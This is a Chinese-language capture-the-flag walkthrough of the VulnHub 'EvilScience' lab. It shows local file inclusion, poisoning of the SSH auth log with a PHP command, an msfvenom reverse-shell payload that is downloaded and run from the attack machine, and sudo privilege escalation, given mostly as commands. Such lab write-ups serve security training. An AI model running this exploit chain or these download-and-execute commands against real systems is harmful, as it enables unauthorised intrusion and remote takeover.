综合实战第三章
日志注入实战
环境准备
靶场下载:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/
攻击机:
kali 192.168.3.134
win7 192.168.3.137
靶机:evilscience 192.168.3.173
信息搜集
先看看这个靶场的端口信息
Linux
nmap -p- -A 192.168.3.173

image-20220503171914748
先打开网站看看

image-20220503172801639
在ABOUT US
里发现应该有文件包含漏洞

image-20220503185010583
抓包然后放到intruder用字典跑一下

image-20220503191507832
跑出来一些东西

image-20220503195814460
看到了ssh的日志文件

image-20220503200630846
可以构造一句话木马写入日志里
Linux
ssh ''@192.168.3.173
然后在burpsuite里构造
Linux
?file=/var/log/auth.log&cmd=phpinfo();

image-20220503201136938
测试成功!
上传木马
先制作木马
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.3.134 lport=4444 -f elf > /root/shell.elf
打开msf
Linux
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.3.134
exploit
再打开http
Linux
python -m SimpleHTTPServer
设置好监听之后,准备上传
构造上传语句
Linux
/?file=/var/log/auth.log&cmd=system('wget+http://192.168.3.134:8000/shell.elf');
/?file=/var/log/auth.log&cmd=system('chmod+%2bx+shell.elf');
/?file=/var/log/auth.log&cmd=system('./shell.elf')%3b
连接成功!

image-20220503202449616
提权
接下来就是提权了
先美化
Linux
python -c 'import pty;pty.spawn("/bin/bash")'
然后找一下权限

image-20220503202859959
看到有个root权限的
看下怎么用
发现是个查看日志文件的程序
再打开一个msf
和上面配置一样,设置好监听
构造语句
Linux
sudo ./xxxlogauditorxxx.py
/var/log/auth.log|./shell.elf
成功连接

image-20220503203718563
找到flag
进入根目录,发现有个flag.png文件,把他传到本地,然后查看

image-20220503204521117
发现flag不在这,用cat查看一下
Linux
cat flag.png

image-20220503204619803
看到有一段64编码的,把他提出来解密
Linux
base64 -d bsflag.txt > flag.txt

image-20220503204836099
得到flag,结束!